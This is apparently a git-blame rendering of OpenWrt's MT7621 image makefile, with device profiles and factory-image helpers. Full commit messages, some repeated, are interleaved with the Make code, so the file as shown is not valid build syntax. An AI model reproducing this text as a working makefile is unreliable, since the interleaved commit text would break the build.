openwrt/target/linux/ramips/image/mt7621.mk

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#
# MT7621 Profiles
#
include ./common-tp-link.mk
DEFAULT_SOC := mt7621
KERNEL_DTB += -d21
DEVICE_VARS += UIMAGE_MAGIC
# The OEM webinterface expects an kernel with initramfs which has the uImage
# header field ih_name.
# We don't want to set the header name field for the kernel include in the
# sysupgrade image as well, as this image shouldn't be accepted by the OEM
# webinterface. It will soft-brick the board.
define Build/custom-initramfs-uimage
mkimage -A $(LINUX_KARCH) \
-O linux -T kernel \
-C lzma -a $(KERNEL_LOADADDR) $(if $(UIMAGE_MAGIC),-M $(UIMAGE_MAGIC),) \
-e $(if $(KERNEL_ENTRY),$(KERNEL_ENTRY),$(KERNEL_LOADADDR)) \
-n '$(1)' -d $@ $@.new
mv $@.new $@
endef
define Build/elecom-gst-factory
$(eval product=$(word 1,$(1)))
$(eval version=$(word 2,$(1)))
( $(STAGING_DIR_HOST)/bin/mkhash md5 $@ | tr -d '\n' ) >> $@
( \
echo -n "ELECOM $(product) v$(version)" | \
dd bs=32 count=1 conv=sync; \
dd if=$@; \
) > $@.new
mv $@.new $@
echo -n "MT7621_ELECOM_$(product)" >> $@
endef
define Build/elecom-wrc-factory
$(eval product=$(word 1,$(1)))
$(eval version=$(word 2,$(1)))
$(STAGING_DIR_HOST)/bin/mkhash md5 $@ >> $@
( \
echo -n "ELECOM $(product) v$(version)" | \
dd bs=32 count=1 conv=sync; \
dd if=$@; \
) > $@.new
mv $@.new $@
endef
ramips: add support for I-O DATA WN-AX1167GR I-O DATA WN-AX1167GR is a 2.4/5 GHz band 11ac router, based on MediaTek MT7621A. Specification: - MT7621A (2-Cores, 4-Threads) - 64 MB of RAM (DDR2) - 16 MB of Flash (SPI) - 2T2R 2.4/5 GHz - 5x 10/100/1000 Mbps Ethernet - 2x LEDs, 4x keys (2x buttons, 1x slide switch) - UART header on PCB - Vcc, GND, TX, RX from ethernet port side - baudrate: 115200 bps (U-Boot, OpenWrt) Stock firmware: In the stock firmware, WN-AX1167GR has two os images each composed of Linux kernel and rootfs. These images are stored in "Kernel" and "app" partition of the following partitions, respectively. (excerpt from dmesg): MX25L12805D(c2 2018c220) (16384 Kbytes) mtd .name = raspi, .size = 0x01000000 (16M) .erasesize = 0x00010000 (64K) .numeraseregions = 0 Creating 10 MTD partitions on "raspi": 0x000000000000-0x000001000000 : "ALL" 0x000000000000-0x000000030000 : "Bootloader" 0x000000030000-0x000000040000 : "Config " 0x000000040000-0x000000050000 : "Factory" 0x000000050000-0x000000060000 : "iNIC_rf" 0x000000060000-0x0000007e0000 : "Kernel" 0x000000800000-0x000000f80000 : "app" 0x000000f90000-0x000000fa0000 : "Key" 0x000000fa0000-0x000000fb0000 : "backup" 0x000000fb0000-0x000001000000 : "storage" The flag for boot partition is stored in "Key" partition, and U-Boot reads this and determines the partition to boot. If the image that U-Boot first reads according to the flag is "Bad Magic Number", U-Boot then tries to boot from the other image. If the second image is correct, change the flag to the number corresponding to that image and boot from that image. (example): ## Booting image at bc800000 ... Bad Magic Number,FFFFFFFF Boot from KERNEL 1 !! ## Booting image at bc060000 ... Image Name: MIPS OpenWrt Linux-4.14.50 Image Type: MIPS Linux kernel Image (lzma compressed) Data Size: 1865917 Bytes = 1.8 MB Load Address: 80001000 Entry Point: 80001000 Verifying Checksum ... OK Uncompressing Kernel Image ... OK raspi_erase_write: offs:f90000, count:34 . . Done! Starting kernel ... Flash instruction using factory image: 1. Connect the computer to the LAN port of WN-AX1167GR 2. Connect power cable to WN-AX1167GR and turn on it 3. Access to "192.168.0.1" on the web browser and open firmware update page ("ファームウェア") 4. Select the OpenWrt factory image and perform firmware update 5. On the initramfs image, execute "mtd erase firmware" to erase stock firmware and execute sysupgrade with sysupgrade image for WN-AX1167GR 6. Wait ~180 seconds to complete flasing Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
2018-06-27 13:47:13 +00:00
define Build/iodata-factory
$(eval fw_size=$(word 1,$(1)))
$(eval fw_type=$(word 2,$(1)))
$(eval product=$(word 3,$(1)))
$(eval factory_bin=$(word 4,$(1)))
if [ -e $(KDIR)/tmp/$(KERNEL_INITRAMFS_IMAGE) -a "$$(stat -c%s $@)" -lt "$(fw_size)" ]; then \
$(CP) $(KDIR)/tmp/$(KERNEL_INITRAMFS_IMAGE) $(factory_bin); \
$(STAGING_DIR_HOST)/bin/mksenaofw \
-r 0x30a -p $(product) -t $(fw_type) \
-e $(factory_bin) -o $(factory_bin).new; \
mv $(factory_bin).new $(factory_bin); \
$(CP) $(factory_bin) $(BIN_DIR)/; \
ramips: add support for I-O DATA WN-AX1167GR I-O DATA WN-AX1167GR is a 2.4/5 GHz band 11ac router, based on MediaTek MT7621A. Specification: - MT7621A (2-Cores, 4-Threads) - 64 MB of RAM (DDR2) - 16 MB of Flash (SPI) - 2T2R 2.4/5 GHz - 5x 10/100/1000 Mbps Ethernet - 2x LEDs, 4x keys (2x buttons, 1x slide switch) - UART header on PCB - Vcc, GND, TX, RX from ethernet port side - baudrate: 115200 bps (U-Boot, OpenWrt) Stock firmware: In the stock firmware, WN-AX1167GR has two os images each composed of Linux kernel and rootfs. These images are stored in "Kernel" and "app" partition of the following partitions, respectively. (excerpt from dmesg): MX25L12805D(c2 2018c220) (16384 Kbytes) mtd .name = raspi, .size = 0x01000000 (16M) .erasesize = 0x00010000 (64K) .numeraseregions = 0 Creating 10 MTD partitions on "raspi": 0x000000000000-0x000001000000 : "ALL" 0x000000000000-0x000000030000 : "Bootloader" 0x000000030000-0x000000040000 : "Config " 0x000000040000-0x000000050000 : "Factory" 0x000000050000-0x000000060000 : "iNIC_rf" 0x000000060000-0x0000007e0000 : "Kernel" 0x000000800000-0x000000f80000 : "app" 0x000000f90000-0x000000fa0000 : "Key" 0x000000fa0000-0x000000fb0000 : "backup" 0x000000fb0000-0x000001000000 : "storage" The flag for boot partition is stored in "Key" partition, and U-Boot reads this and determines the partition to boot. If the image that U-Boot first reads according to the flag is "Bad Magic Number", U-Boot then tries to boot from the other image. If the second image is correct, change the flag to the number corresponding to that image and boot from that image. (example): ## Booting image at bc800000 ... Bad Magic Number,FFFFFFFF Boot from KERNEL 1 !! ## Booting image at bc060000 ... Image Name: MIPS OpenWrt Linux-4.14.50 Image Type: MIPS Linux kernel Image (lzma compressed) Data Size: 1865917 Bytes = 1.8 MB Load Address: 80001000 Entry Point: 80001000 Verifying Checksum ... OK Uncompressing Kernel Image ... OK raspi_erase_write: offs:f90000, count:34 . . Done! Starting kernel ... Flash instruction using factory image: 1. Connect the computer to the LAN port of WN-AX1167GR 2. Connect power cable to WN-AX1167GR and turn on it 3. Access to "192.168.0.1" on the web browser and open firmware update page ("ファームウェア") 4. Select the OpenWrt factory image and perform firmware update 5. On the initramfs image, execute "mtd erase firmware" to erase stock firmware and execute sysupgrade with sysupgrade image for WN-AX1167GR 6. Wait ~180 seconds to complete flasing Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
2018-06-27 13:47:13 +00:00
else \
echo "WARNING: initramfs kernel image too big, cannot generate factory image" >&2; \
fi
endef
2019-04-09 05:48:31 +00:00
define Build/iodata-mstc-header
( \
data_size_crc="$$(dd if=$@ ibs=64 skip=1 2>/dev/null | gzip -c | \
tail -c 8 | od -An -tx8 --endian little | tr -d ' \n')"; \
echo -ne "$$(echo $$data_size_crc | sed 's/../\\x&/g')" | \
dd of=$@ bs=8 count=1 seek=7 conv=notrunc 2>/dev/null; \
)
dd if=/dev/zero of=$@ bs=4 count=1 seek=1 conv=notrunc 2>/dev/null
( \
header_crc="$$(dd if=$@ bs=64 count=1 2>/dev/null | gzip -c | \
tail -c 8 | od -An -N4 -tx4 --endian little | tr -d ' \n')"; \
echo -ne "$$(echo $$header_crc | sed 's/../\\x&/g')" | \
dd of=$@ bs=4 count=1 seek=1 conv=notrunc 2>/dev/null; \
)
2019-04-09 05:48:31 +00:00
endef
define Build/ubnt-erx-factory-image
if [ -e $(KDIR)/tmp/$(KERNEL_INITRAMFS_IMAGE) -a "$$(stat -c%s $@)" -lt "$(KERNEL_SIZE)" ]; then \
echo '21001:7' > $(1).compat; \
$(TAR) -cf $(1) --transform='s/^.*/compat/' $(1).compat; \
\
$(TAR) -rf $(1) --transform='s/^.*/vmlinux.tmp/' $(KDIR)/tmp/$(KERNEL_INITRAMFS_IMAGE); \
mkhash md5 $(KDIR)/tmp/$(KERNEL_INITRAMFS_IMAGE) > $(1).md5; \
$(TAR) -rf $(1) --transform='s/^.*/vmlinux.tmp.md5/' $(1).md5; \
\
echo "dummy" > $(1).rootfs; \
$(TAR) -rf $(1) --transform='s/^.*/squashfs.tmp/' $(1).rootfs; \
\
mkhash md5 $(1).rootfs > $(1).md5; \
$(TAR) -rf $(1) --transform='s/^.*/squashfs.tmp.md5/' $(1).md5; \
\
echo '$(BOARD) $(VERSION_CODE) $(VERSION_NUMBER)' > $(1).version; \
$(TAR) -rf $(1) --transform='s/^.*/version.tmp/' $(1).version; \
\
$(CP) $(1) $(BIN_DIR)/; \
else \
echo "WARNING: initramfs kernel image too big, cannot generate factory image" >&2; \
fi
endef
define Device/adslr_g7
IMAGE_SIZE := 16064k
DEVICE_VENDOR := ADSLR
DEVICE_MODEL := G7
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
endef
TARGET_DEVICES += adslr_g7
define Device/afoundry_ew1200
IMAGE_SIZE := 16064k
DEVICE_VENDOR := AFOUNDRY
DEVICE_MODEL := EW1200
DEVICE_PACKAGES := kmod-ata-ahci kmod-mt76x2 kmod-mt7603 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic
SUPPORTED_DEVICES += ew1200
endef
TARGET_DEVICES += afoundry_ew1200
ramips: add support for ALFA Network Quad-E4G ALFA Network Quad-E4G is a universal Wi-Fi/4G platform, which offers three miniPCIe (PCIe, USB 2.0, SIM) and a single M.2 B-key (dual-SIM, USB 3.0) slots, RTC and five Gigabit Ethernet ports with PoE support. Specification: - MT7621A (880 MHz) - 256/512 MB of RAM (DDR3) - 16/32+ MB of FLASH (SPI NOR) - optional second SPI flash (8-pin WSON/SOIC) - 1x microSD (SDXC) flash card reader - 5x 10/100/100 Mbps Ethernet, with passive PoE support (24 V) in LAN1 - optional 802.3at/af PoE module for WAN - 3x miniPCIe slot (with PCIe and USB 2.0 buses, micro SIM and 5 V) - 1x M.2/NGFF B-key 3042 (USB 3.0/2.0, mini + micro SIM) - RTC (TI BQ32002, I2C bus) with backup battery (CR2032) - external hardware watchdog (EM Microelectronic EM6324) - 1x USB 2.0 Type-A - 1x micro USB Type-B for system serial console (Holtek HT42B534) - 11x LED (5 for Ethernet, 5 driven by GPIO, 1x power indicator) - 3x button (reset, user1, user2) - 1x I2C (4-pin, 2.54 mm pitch) header on PCB - 4x SIM (6-pin, 2.00 mm pitch) headers on PCB - 2x UART2/3 (4-pin, 2.54 mm pitch) headers on PCB - 1x mechanical power switch - 1x DC jack with lock (24 V) Other: - U-Boot selects default SIM slot, based on value of 'default_sim' env variable: '1' or unset -> SIM1 (mini), '2' -> SIM2 (micro). This board has additional logic circuit for M.2 SIM switching. The 'sim-select' will work only if both SIM slots are occupied. Otherwise, always slot with SIM inside is selected, no matter 'sim-select' value. - U-Boot enables power in all three miniPCIe and M.2 slots before loading the kernel - this board supports 'dual image' feature (controlled by 'dual_image' U-Boot environment variable) - all three miniPCIe slots have additional 5 V supply on pins 47 and 49 - the board allows to install up to two oversized miniPCIe cards (vendor has dedicated MediaTek MT7615N/D cards for this board) - this board has additional logic circuit controlling PERSTn pins inside miniPCIe slots. By default, PERSTn (GPIO19) is routed to all miniPCIe slots but setting GPIO22 to high allows PERSTn control per slot, using GPIO23-25 (value is inverted) You can use the 'sysupgrade' image directly in vendor firmware which is based on OpenWrt (make sure to not preserve settings - use 'sysupgrade -n -F ...' command). Alternatively, use web recovery mode in U-Boot: 1. Power the device with reset button pressed, the modem LED will start blinking slowly and after ~3 seconds, when it starts blinking faster, you can release the button. 2. Setup static IP 192.168.1.2/24 on your PC. 3. Go to 192.168.1.1 in browser and upload 'sysupgrade' image. Signed-off-by: Piotr Dymacz <pepe2k@gmail.com>
2019-11-03 11:12:44 +00:00
define Device/alfa-network_quad-e4g
IMAGE_SIZE := 16064k
DEVICE_VENDOR := ALFA Network
DEVICE_MODEL := Quad-E4G
DEVICE_PACKAGES := kmod-ata-ahci kmod-sdhci-mt7620 kmod-usb3 uboot-envtools
ramips: add support for ALFA Network Quad-E4G ALFA Network Quad-E4G is a universal Wi-Fi/4G platform, which offers three miniPCIe (PCIe, USB 2.0, SIM) and a single M.2 B-key (dual-SIM, USB 3.0) slots, RTC and five Gigabit Ethernet ports with PoE support. Specification: - MT7621A (880 MHz) - 256/512 MB of RAM (DDR3) - 16/32+ MB of FLASH (SPI NOR) - optional second SPI flash (8-pin WSON/SOIC) - 1x microSD (SDXC) flash card reader - 5x 10/100/100 Mbps Ethernet, with passive PoE support (24 V) in LAN1 - optional 802.3at/af PoE module for WAN - 3x miniPCIe slot (with PCIe and USB 2.0 buses, micro SIM and 5 V) - 1x M.2/NGFF B-key 3042 (USB 3.0/2.0, mini + micro SIM) - RTC (TI BQ32002, I2C bus) with backup battery (CR2032) - external hardware watchdog (EM Microelectronic EM6324) - 1x USB 2.0 Type-A - 1x micro USB Type-B for system serial console (Holtek HT42B534) - 11x LED (5 for Ethernet, 5 driven by GPIO, 1x power indicator) - 3x button (reset, user1, user2) - 1x I2C (4-pin, 2.54 mm pitch) header on PCB - 4x SIM (6-pin, 2.00 mm pitch) headers on PCB - 2x UART2/3 (4-pin, 2.54 mm pitch) headers on PCB - 1x mechanical power switch - 1x DC jack with lock (24 V) Other: - U-Boot selects default SIM slot, based on value of 'default_sim' env variable: '1' or unset -> SIM1 (mini), '2' -> SIM2 (micro). This board has additional logic circuit for M.2 SIM switching. The 'sim-select' will work only if both SIM slots are occupied. Otherwise, always slot with SIM inside is selected, no matter 'sim-select' value. - U-Boot enables power in all three miniPCIe and M.2 slots before loading the kernel - this board supports 'dual image' feature (controlled by 'dual_image' U-Boot environment variable) - all three miniPCIe slots have additional 5 V supply on pins 47 and 49 - the board allows to install up to two oversized miniPCIe cards (vendor has dedicated MediaTek MT7615N/D cards for this board) - this board has additional logic circuit controlling PERSTn pins inside miniPCIe slots. By default, PERSTn (GPIO19) is routed to all miniPCIe slots but setting GPIO22 to high allows PERSTn control per slot, using GPIO23-25 (value is inverted) You can use the 'sysupgrade' image directly in vendor firmware which is based on OpenWrt (make sure to not preserve settings - use 'sysupgrade -n -F ...' command). Alternatively, use web recovery mode in U-Boot: 1. Power the device with reset button pressed, the modem LED will start blinking slowly and after ~3 seconds, when it starts blinking faster, you can release the button. 2. Setup static IP 192.168.1.2/24 on your PC. 3. Go to 192.168.1.1 in browser and upload 'sysupgrade' image. Signed-off-by: Piotr Dymacz <pepe2k@gmail.com>
2019-11-03 11:12:44 +00:00
endef
TARGET_DEVICES += alfa-network_quad-e4g
define Device/asiarf_ap7621-001
ramips/mt7621: fix IMAGE_SIZE for all devices This fixes IMAGE_SIZE for all devices based on the partition size given in DTS: DEVICE *.MK *.DTS VERDICT afoundry_ew1200 (16M) 0xfb0000 asiarf_ap7621-001 (16M) 0xfa0000 wrong buffalo_wsr-1166dhp (16M) 0xf90000 wrong buffalo_wsr-600dhp (16M) 0xfb0000 dlink_dir-860l-b1 (16M) 0xfb0000 d-team_newifi-d2 (32M) 0x1fb0000 d-team_pbr-m1 (16M) 0xfb0000 elecom_wrc-1167ghbk2-s 15488k 0xf20000 elecom_wrc-1900gst 11264k 0xb00000 elecom_wrc-2533gst 11264k 0xb00000 firefly_firewrt (16M) 0xfb0000 gehua_ghl-r-001 (32M) 0x1fb0000 gnubee_gb-pc1 (32M) 0x1fb0000 gnubee_gb-pc2 (32M) 0x1fb0000 hiwifi_hc5962 (32M) 0x2000000 wrong (kernel + ubi) iodata_wn-ax1167gr 15552k 0xf30000 iodata_wn-gx300gr 7798784 0x770000 lenovo_newifi-d1 (32M) 0x1fb0000 linksys_re6500 - 0x7b0000 default mediatek_ap-mt7621a-v60 (8M) 0x7b0000 mediatek_mt7621-eval-board (4M) 0xec0000 wrong (rootfs) mikrotik_rb750gr3 [16128k] 0xfc0000 mikrotik_rbm11g [16128k] 0xFC0000 mikrotik_rbm33g [16128k] 0xFC0000 mqmaker_witi-256m (16M) 0xfb0000 mqmaker_witi-512m (16M) 0xfb0000 mtc_wr1201 16000k 0xfa0000 netgear_ex6150 14848k 0xe80000 netgear_r6220 28672k 0x1c00000 netgear_r6350 40960k 0x2800000 netgear_wndr3700-v5 15232k 0xee0000 netis_wf-2881 129280k 0x7E40000 phicomm_k2p 15744k 0xf60000 planex_vr500 66453504 0x3fb0000 wrong samknows_whitebox-v8 (16M) 0xfb0000 storylink_sap-g3200u3 - 0x7b0000 default telco-electronics_x1 16064k 0xfb0000 thunder_timecloud - 0xfb0000 wrong totolink_a7000r 16064k 0xfb0000 tplink_re350-v1 6016k 0x5e0000 ubiquiti_edgerouterx - 0xfa00000 wrong (kernel1 + ubi) ubiquiti_edgerouterx-sfp - 0xfa00000 wrong (kernel1 + ubi) unielec_u7621-06-256m-16m 16064k 0xfb0000 unielec_u7621-06-512m-64m 65216k 0x3fb0000 wevo_11acnas (16M) 0xfb0000 wevo_w2914ns-v2 (16M) 0xfb0000 xiaomi_mir3g 32768k 0x7980000 wrong (kernel + ubi) xiaomi_mir3p (32M) 0xf980000 wrong (kernel + ubi) xzwifi_creativebox-v1 (32M) 0x1fb0000 youhua_wr1200js 16064k 0xfb0000 youku_yk-l2 (16M) 0xfb0000 zbtlink_zbt-we1326 (16M) 0xfb0000 zbtlink_zbt-we3526 (16M) 0xfb0000 zbtlink_zbt-wg2626 (16M) 0xfb0000 zbtlink_zbt-wg3526-16m (16M) 0xfb0000 zbtlink_zbt-wg3526-32m (32M) 0x1fb0000 No verdict means that the device is correctly set. Legend: ( ): Value is set via ralink_default_fw_size_xxM [ ]: Value is derived from parent definition - : Value is not set and derived from default definition Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2019-07-15 12:55:24 +00:00
IMAGE_SIZE := 16000k
DEVICE_VENDOR := AsiaRF
DEVICE_MODEL := AP7621-001
DEVICE_PACKAGES := kmod-sdhci-mt7620 kmod-mt76x2 kmod-usb3
endef
TARGET_DEVICES += asiarf_ap7621-001
define Device/asiarf_ap7621-nv1
IMAGE_SIZE := 16000k
DEVICE_VENDOR := AsiaRF
DEVICE_MODEL := AP7621-NV1
DEVICE_PACKAGES := kmod-sdhci-mt7620 kmod-mt76x2 kmod-usb3
endef
TARGET_DEVICES += asiarf_ap7621-nv1
define Device/asus_rt-ac57u
DEVICE_VENDOR := ASUS
DEVICE_MODEL := RT-AC57U
IMAGE_SIZE := 16064k
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic
endef
TARGET_DEVICES += asus_rt-ac57u
define Device/asus_rt-ac65p
DEVICE_VENDOR := ASUS
DEVICE_MODEL := RT-AC65P
IMAGE_SIZE := 51200k
UBINIZE_OPTS := -E 5
BLOCKSIZE := 128k
PAGESIZE := 2048
KERNEL_SIZE := 4096k
IMAGES += factory.bin
IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata
IMAGE/factory.bin := append-kernel | pad-to $$(KERNEL_SIZE) | append-ubi | \
check-size
DEVICE_PACKAGES := kmod-usb3 kmod-mt7615e kmod-mt7615-firmware wpad-basic uboot-envtools
endef
TARGET_DEVICES += asus_rt-ac65p
define Device/asus_rt-ac85p
DEVICE_VENDOR := ASUS
DEVICE_MODEL := RT-AC85P
IMAGE_SIZE := 51200k
UBINIZE_OPTS := -E 5
BLOCKSIZE := 128k
PAGESIZE := 2048
KERNEL_SIZE := 4096k
IMAGES += factory.bin
IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata
IMAGE/factory.bin := append-kernel | pad-to $$(KERNEL_SIZE) | append-ubi | \
check-size
DEVICE_PACKAGES := kmod-usb3 kmod-mt7615e kmod-mt7615-firmware wpad-basic uboot-envtools
endef
TARGET_DEVICES += asus_rt-ac85p
define Device/buffalo_wsr-1166dhp
$(Device/uimage-lzma-loader)
IMAGE/sysupgrade.bin := trx | pad-rootfs | append-metadata
ramips/mt7621: fix IMAGE_SIZE for all devices This fixes IMAGE_SIZE for all devices based on the partition size given in DTS: DEVICE *.MK *.DTS VERDICT afoundry_ew1200 (16M) 0xfb0000 asiarf_ap7621-001 (16M) 0xfa0000 wrong buffalo_wsr-1166dhp (16M) 0xf90000 wrong buffalo_wsr-600dhp (16M) 0xfb0000 dlink_dir-860l-b1 (16M) 0xfb0000 d-team_newifi-d2 (32M) 0x1fb0000 d-team_pbr-m1 (16M) 0xfb0000 elecom_wrc-1167ghbk2-s 15488k 0xf20000 elecom_wrc-1900gst 11264k 0xb00000 elecom_wrc-2533gst 11264k 0xb00000 firefly_firewrt (16M) 0xfb0000 gehua_ghl-r-001 (32M) 0x1fb0000 gnubee_gb-pc1 (32M) 0x1fb0000 gnubee_gb-pc2 (32M) 0x1fb0000 hiwifi_hc5962 (32M) 0x2000000 wrong (kernel + ubi) iodata_wn-ax1167gr 15552k 0xf30000 iodata_wn-gx300gr 7798784 0x770000 lenovo_newifi-d1 (32M) 0x1fb0000 linksys_re6500 - 0x7b0000 default mediatek_ap-mt7621a-v60 (8M) 0x7b0000 mediatek_mt7621-eval-board (4M) 0xec0000 wrong (rootfs) mikrotik_rb750gr3 [16128k] 0xfc0000 mikrotik_rbm11g [16128k] 0xFC0000 mikrotik_rbm33g [16128k] 0xFC0000 mqmaker_witi-256m (16M) 0xfb0000 mqmaker_witi-512m (16M) 0xfb0000 mtc_wr1201 16000k 0xfa0000 netgear_ex6150 14848k 0xe80000 netgear_r6220 28672k 0x1c00000 netgear_r6350 40960k 0x2800000 netgear_wndr3700-v5 15232k 0xee0000 netis_wf-2881 129280k 0x7E40000 phicomm_k2p 15744k 0xf60000 planex_vr500 66453504 0x3fb0000 wrong samknows_whitebox-v8 (16M) 0xfb0000 storylink_sap-g3200u3 - 0x7b0000 default telco-electronics_x1 16064k 0xfb0000 thunder_timecloud - 0xfb0000 wrong totolink_a7000r 16064k 0xfb0000 tplink_re350-v1 6016k 0x5e0000 ubiquiti_edgerouterx - 0xfa00000 wrong (kernel1 + ubi) ubiquiti_edgerouterx-sfp - 0xfa00000 wrong (kernel1 + ubi) unielec_u7621-06-256m-16m 16064k 0xfb0000 unielec_u7621-06-512m-64m 65216k 0x3fb0000 wevo_11acnas (16M) 0xfb0000 wevo_w2914ns-v2 (16M) 0xfb0000 xiaomi_mir3g 32768k 0x7980000 wrong (kernel + ubi) xiaomi_mir3p (32M) 0xf980000 wrong (kernel + ubi) xzwifi_creativebox-v1 (32M) 0x1fb0000 youhua_wr1200js 16064k 0xfb0000 youku_yk-l2 (16M) 0xfb0000 zbtlink_zbt-we1326 (16M) 0xfb0000 zbtlink_zbt-we3526 (16M) 0xfb0000 zbtlink_zbt-wg2626 (16M) 0xfb0000 zbtlink_zbt-wg3526-16m (16M) 0xfb0000 zbtlink_zbt-wg3526-32m (32M) 0x1fb0000 No verdict means that the device is correctly set. Legend: ( ): Value is set via ralink_default_fw_size_xxM [ ]: Value is derived from parent definition - : Value is not set and derived from default definition Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2019-07-15 12:55:24 +00:00
IMAGE_SIZE := 15936k
DEVICE_VENDOR := Buffalo
DEVICE_MODEL := WSR-1166DHP
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 wpad-basic
SUPPORTED_DEVICES += wsr-1166
endef
TARGET_DEVICES += buffalo_wsr-1166dhp
define Device/buffalo_wsr-2533dhpl
$(Device/uimage-lzma-loader)
IMAGE_SIZE := 7936k
DEVICE_VENDOR := Buffalo
DEVICE_MODEL := WSR-2533DHPL
DEVICE_ALT0_VENDOR := Buffalo
DEVICE_ALT0_MODEL := WSR-2533DHP
IMAGE/sysupgrade.bin := trx | pad-rootfs | append-metadata
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
endef
TARGET_DEVICES += buffalo_wsr-2533dhpl
define Device/buffalo_wsr-600dhp
IMAGE_SIZE := 16064k
DEVICE_VENDOR := Buffalo
DEVICE_MODEL := WSR-600DHP
DEVICE_PACKAGES := kmod-mt7603 kmod-rt2800-pci wpad-basic
SUPPORTED_DEVICES += wsr-600
endef
TARGET_DEVICES += buffalo_wsr-600dhp
define Device/dlink_dir-860l-b1
$(Device/seama)
BLOCKSIZE := 64k
SEAMA_SIGNATURE := wrgac13_dlink.2013gui_dir860lb
LOADER_TYPE := bin
KERNEL := kernel-bin | append-dtb | lzma | loader-kernel | relocate-kernel | \
lzma -a0 | uImage lzma
IMAGE_SIZE := 16064k
DEVICE_VENDOR := D-Link
DEVICE_MODEL := DIR-860L
DEVICE_VARIANT := B1
DEVICE_PACKAGES := kmod-mt76x2 kmod-usb3 kmod-usb-ledtrig-usbport wpad-basic
SUPPORTED_DEVICES += dir-860l-b1
endef
TARGET_DEVICES += dlink_dir-860l-b1
define Device/d-team_newifi-d2
$(Device/uimage-lzma-loader)
IMAGE_SIZE := 32448k
DEVICE_VENDOR := Newifi
DEVICE_MODEL := D2
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic
endef
TARGET_DEVICES += d-team_newifi-d2
define Device/d-team_pbr-m1
IMAGE_SIZE := 16064k
DEVICE_VENDOR := PandoraBox
DEVICE_MODEL := PBR-M1
DEVICE_PACKAGES := kmod-ata-ahci kmod-mt7603 kmod-mt76x2 kmod-sdhci-mt7620 \
kmod-usb3 kmod-usb-ledtrig-usbport wpad-basic
SUPPORTED_DEVICES += pbr-m1
endef
TARGET_DEVICES += d-team_pbr-m1
define Device/edimax_ra21s
$(Device/uimage-lzma-loader)
IMAGE_SIZE := 16064k
DEVICE_VENDOR := Edimax
DEVICE_MODEL := RA21S
DEVICE_ALT0_VENDOR := Edimax
DEVICE_ALT0_MODEL := Gemini RA21S
IMAGES += factory.bin
IMAGE/factory.bin := $$(sysupgrade_bin) | check-size | \
elx-header 02020040 8844A2D168B45A2D
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
endef
TARGET_DEVICES += edimax_ra21s
ramips: add support for Edimax Gemini RE23S Hardware -------- SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads) RAM: 128MB FLASH: 16MB NOR (Macronix MX25L12805D) ETH: 1x 10/100/1000 Mbps Ethernet (MT7530) WIFI: - 2.4GHz: 1x MT7615 (4x4:4) - 5GHz: 1x MT7615 (4x4:4) - 4 antennas: 2 external detachable and 2 internal BTN: - 1x Reset button - 1x WPS button LEDS: - 1x Green led (Power) - 1x Green-Amber-Red led (Wifi) UART: - 57600-8-N-1 Everything works correctly. Installation ------------ Flash the factory image directly from OEM web interface. (You can login using these credentials: admin/1234) Restore OEM Firmware -------------------- Flash the OEM "bin" firmware directly from LUCI. The firmware is downloadable from the OEM web page. Warning: Remember to not keep settings! Warning2: Remember to force the flash. Restoring procedure tested with RE23_1.08.bin MAC addresses ------------- factory 0x4 *:24 factory 0x8004 *:25 Cimage 0x07 *:24 Cimage 0x0D *:24 Cimage 0x13 *:24 Cimage 0x19 *:25 No other addresses were found in factory partition. Since the label contains both the 2.4GHz and 5GHz mac address I decided to set the 5GHz one as label-mac-device. Moreover it also corresponds to the lan mac address. Notes ----- The wifi led in the OEM firmware changes colour depending on the signal strength. This can be done in OpenWrt but just for one interface. So for now will not be any default action for this led. If you want to open the case, pay attention to the antenna placed on the bottom part of the front cover. The wire is a bit short and it breaks easily. (I broke it) Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com> [fix two typos and add extended MAC address section to commit message] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2020-05-19 23:27:56 +00:00
define Device/edimax_re23s
$(Device/uimage-lzma-loader)
IMAGE_SIZE := 15680k
DEVICE_VENDOR := Edimax
DEVICE_MODEL := RE23S
DEVICE_ALT0_VENDOR := Edimax
DEVICE_ALT0_MODEL := Gemini RE23S
IMAGE/sysupgrade.bin := append-kernel | append-rootfs | \
edimax-header -s CSYS -m RN76 -f 0x70000 -S 0x01100000 | pad-rootfs | \
append-metadata | check-size
IMAGES += factory.bin
IMAGE/factory.bin := append-kernel | append-rootfs | \
edimax-header -s CSYS -m RN76 -f 0x70000 -S 0x01100000 | pad-rootfs | \
check-size
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
endef
TARGET_DEVICES += edimax_re23s
define Device/edimax_rg21s
$(Device/uimage-lzma-loader)
IMAGE_SIZE := 16064k
DEVICE_VENDOR := Edimax
DEVICE_MODEL := Gemini AC2600 RG21S
IMAGES += factory.bin
IMAGE/factory.bin := $$(sysupgrade_bin) | check-size | \
elx-header 02020038 8844A2D168B45A2D
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
endef
TARGET_DEVICES += edimax_rg21s
define Device/elecom_wrc-1167ghbk2-s
IMAGE_SIZE := 15488k
DEVICE_VENDOR := ELECOM
DEVICE_MODEL := WRC-1167GHBK2-S
IMAGES += factory.bin
IMAGE/factory.bin := $$(sysupgrade_bin) | check-size | \
elecom-wrc-factory WRC-1167GHBK2-S 0.00
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
endef
TARGET_DEVICES += elecom_wrc-1167ghbk2-s
define Device/elecom_wrc-1900gst
$(Device/uimage-lzma-loader)
IMAGE_SIZE := 11264k
